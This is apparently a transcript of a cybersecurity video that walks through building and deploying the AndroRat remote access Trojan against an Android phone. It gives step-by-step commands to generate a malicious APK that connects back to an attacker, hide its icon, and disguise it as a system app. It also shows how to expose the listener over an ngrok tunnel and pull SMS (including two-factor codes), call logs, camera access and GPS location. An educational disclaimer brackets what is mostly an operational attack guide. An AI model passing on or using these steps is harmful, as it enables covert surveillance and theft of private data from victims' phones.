Imagine your phone is sitting right next to you. It's locked. You aren't touching it, but miles away, someone is listening through your microphone. They're reading your texts, downloading your photos, and watching your GPS location move in real time. This isn't a scene from a spy movie. It's what happens when a device is infected with a rat, a remote access Trojan. And today, we're talking about the grandfather of Android malware, AndroRat. Before we go any further, a massive disclaimer. This video is for educational and ethical hacking purposes only. Unauthorized access to a computer system or mobile device is illegal. The information provided here is to help you understand how attackers operate so you can better defend your own devices. Do not use these tools on any device you do not own or have explicit written permission to test. I am not responsible for any misuse of this information. So, what is AndroRat? It first surfaced in 2012, and originally it wasn't even meant to be malware. It started as a university project by a team of 4 students in France. It was designed as an open-source tool for remote administration, basically a way to manage your phone from your PC. But because the code was open source and posted on GitHub, it didn't take long for the darker side of the internet to realize its potential. Cybercriminals took that student project and turned it into a weapon. How does it get onto a phone? Usually through an APK binder. An attacker takes a legitimate app, like a free version of a popular game or a utility tool. They use a binder tool to inject the AndroRat code into that legitimate app. The victim downloads this infected app from a third-party website or a sketchy forum. Once installed, the app works perfectly fine. You're playing the game, but in the background, AndroRat is opening a backdoor to a command and control C2 server. Key features of AndroRat: stealing data, contacts, call logs, and SMS messages; surveillance, activating the camera or microphone silently; location, tracking the device via GPS; system control, sending texts or making calls without the user knowing. But here's the thing. The only way to truly build a strong defense is to understand the enemy's offense. I'm not teaching you how to be a hacker. I'm giving you the blueprints of their attack so you can spot the weaknesses in your own digital life before they do. You need to see this. Your friends and family need to see this. Let's begin the operation. As always, we'll start by updating our Kali Linux system. Open your terminal and run sudo apt update. This command refreshes our package database, ensuring we have the latest information about available software. Keeping your system updated is a fundamental security practice. Next, let's run sudo apt upgrade. When prompted, type Y to continue. This installs the newest versions of all packages on our system. This might take a few minutes, depending on how many updates are available. Now we need to install AndroRat. Unlike some tools, AndroRat isn't included in the default Kali Linux repositories, so we'll need to download it from GitHub. Open your browser and search for AndroRat. Click on the first result to open the GitHub repository. This is the official repository for the AndroRat tool. Now we need to clone this repository to our local machine. Copy the URL from the address bar or from the code button on the page. Return to your terminal and type git clone followed by pasting the URL you just copied. Press enter to start the cloning process. Once the repository is cloned, we need to navigate to the AndroRat directory. Type cd AndroRat and press enter. Let's see what files we have by typing ls. You should see various files, including a requirements.txt file, which contains all the Python dependencies we'll need to install. Before installing the requirements, it's a good practice to create a virtual environment to keep our project dependencies isolated. This prevents conflicts between different Python projects. Type python3-m venv to create a virtual environment named venv. Now we need to activate this virtual environment. Type source venv/bin/activate and press enter. You should notice your terminal prompt change, indicating that the virtual environment is now active. With our virtual environment set up, Let's install the required dependencies by typing pip3 install-r requirements.txt. This might take a minute as it downloads and installs all the necessary packages. Now that AndroRat is installed, we need to know our attacker machine's IP address to create our malicious application. Type ifconfig in the terminal and look for your machine's IP address, typically under the ETH0 or WLAN0 interface. Make a note of this IP address. We'll need it in the next step. Now, we're ready to create our malicious APK file. The APK is what will be installed on the target device, establishing a connection back to our attacker machine. Type python3 androrat.py --build-i your IP address -8000-0 rat.apk and press enter. Let me break down this command. Python3 androrat.py launches the AndroRat tool. --build tells it to create a malicious APK file. -i followed by your IP address specifies where the infected device should connect back to. -p8000 sets the port number for the connection, and -o rat.apk names our output file rat.apk. I should mention that AndroRat also allows you to customize the app icon to make it look legitimate using the ~icon parameter, followed by the path to an icon file. Attackers often use familiar logos like Google, Facebook, or system app icons to trick users into trusting the app. For our demonstration, we won't use this option because without specifying an icon, the app will automatically hide itself after installation, making it even harder to detect. You'll see AndroRat start generating the APK file. What's happening behind the scenes is that the tool is creating an Android application embedded with malicious code that will connect back to our machine when installed. This process creates a fully functional Android application that appears legitimate to users, but contains hidden functionality that allows remote control of the device. The generation might take a minute or two to complete. Once finished, you should see a message indicating that the APK has been created successfully. The APK file is saved in your current directory. In real attack scenarios, hackers use various social engineering techniques to trick users into installing malicious applications. They might disguise the app as a game, utility, or even a security tool. They could distribute it via phishing emails, fake websites, or third-party app stores. For our educational demonstration, we'll use a simple method to transfer the APK to our test device. Let's move the APK file to our Documents folder for easier access. Then we'll create a simple web server to allow our test device to download the file. Navigate to where you saved the APK file and type python3-m http.server8080 to start a web server on port 8080. Now, on your test Android device, open a web browser and enter your attacker machine's IP address followed by :8080 in the address bar. You should see a directory listing that includes our rat.apk file. Tap on it to download the file to your Android device. Once downloaded, tap on the file to begin installation. You'll likely see warnings about installing apps from unknown sources. These are security features designed to protect users from exactly this type of attack. For our demonstration purposes, we'll proceed with the installation, but in real life, these warnings should be taken very seriously. After installation, open the app and grant it the permissions it requests. In a real attack scenario, social engineering would be used to convince the victim that these permission requests are legitimate and necessary. The app might disguise itself with an icon and name that appears to be a system application like Google Services Framework to avoid suspicion. Notice that after installation and initial launch, the app icon might disappear from the home screen. This is a technique used by malware to hide itself from the user while continuing to run in the background. Now that our malicious app is installed on the target device, let's return to our attacker machine and set up a listener to receive the connection. In your terminal where AndroRat is installed, type python3 androrat.py --shell-i your IP address -p8000 and press enter. This command starts AndroRat in listening mode, waiting for the infected device to connect back to us. Within moments, you should see a message indicating that a device has connected. This means our malicious app has successfully established a connection back to our attacker machine, and we now have remote access to the target device. You'll be presented with an interpreter prompt where you can enter various commands to control the target device. Let's explore some of the capabilities this gives us. First, let's get a general overview of the target. Type DeviceInfo and press enter. This command pulls the core specifications of the phone's model name, Android version, and hardware details. This is usually the first step an attacker takes to understand the environment they've compromised. Next, let's see how much visual access we have. Type CamList and press enter. This returns a list of available cameras on the device, typically showing both front and back sensors with their index numbers. Using these indices, an attacker could remotely trigger the camera to take photos or record video without any visual indicator on the phone. It's a massive breach of privacy that happens completely in the background. Now, let's look at personal communications. Type Get SMS Inbox and press enter. This command silently retrieves every incoming text message stored on the device and saves them to a local folder. This is particularly dangerous because it gives the attacker access to private conversations and, more importantly, two-factor authentication codes or password reset links. Finally, we can look at the user's social connections. Type Get Call Logs and press enter. This command downloads the entire call history, showing exactly who the user has been talking to, when, and for how long. When you see how quickly these 4 commands can strip away someone's privacy, it really emphasizes why you should never install apps from untrusted sources or click on suspicious links. While seemingly harmless, this demonstrates the level of control an attacker has over the physical functions of the device. Everything we've demonstrated so far works when both the attacker and target are on the same network. However, attackers rarely have the luxury of being on the same Wi-Fi network as their target in real-world scenarios. To maintain control from anywhere in the world, they need to establish a connection over the internet. This is where a tool like Ngrok comes in. First, we need to create a secure tunnel that directs traffic from the internet back to our local machine. We do this by launching Ngrok and specifying the protocol and the port we want to use. Type ngrok TCP 4444. Once we hit enter, Ngrok provides us with a public forwarding address. Take note of this URL, in this case 8.tcp.ngrok.io, and the unique port number 16508. This is the address the malicious app will look for to find us on the web. Now, we need to bake that address into our malicious APK so it knows exactly where to send the data. We'll use AndroRat's build command, but instead of using a local IP, we'll point it to our new Ngrok tunnel. Python3 androrat.py/8.tcp.ngrok.io/p16508/o/devil.apk. The tool handles the heavy lifting. It generates the APK, builds the connection strings, and signs the file. Once it's finished, we have devil.apk ready for deployment. Before we send this to a target, we need our machine to be listening for that incoming connection. Even though the traffic is coming from the internet, Ngrok is redirecting it to our local port 4444. So we set our listener to look at our own machine. Python3 androrat.py/shell/i/0.0.0/p4444. It now says, waiting for connection. Our trap is set. Now, imagine the victim downloads and installs this APK on their phone. The moment they click open and grant permissions, look at our terminal. We're in. We now have a persistent connection across the internet. We can verify the device details immediately by typing DeviceInfo. This gives us the model, Android version, and manufacturer. If we want to see what else we can do, we type Help. This lists every capability we have, from recording audio to dumping SMS logs. For instance, if we want to know exactly where the target is located, we just run det location. Just like that, the attacker has full access to the device's GPS coordinates regardless of where the victim is in the world. This is why downloading APKs from untrusted sources is one of the most dangerous things you can do on a mobile device.
And there you have it, a full walkthrough of using AndroRat to spy on an Android device. Again, this is strictly for educational purposes. Understanding how these tools work is the first step in defending against them. Always get permission before testing on any device and use your knowledge for good. If you found this video helpful, smash that like button, subscribe for more cybersecurity content, and drop a comment if you have questions. Stay safe out there.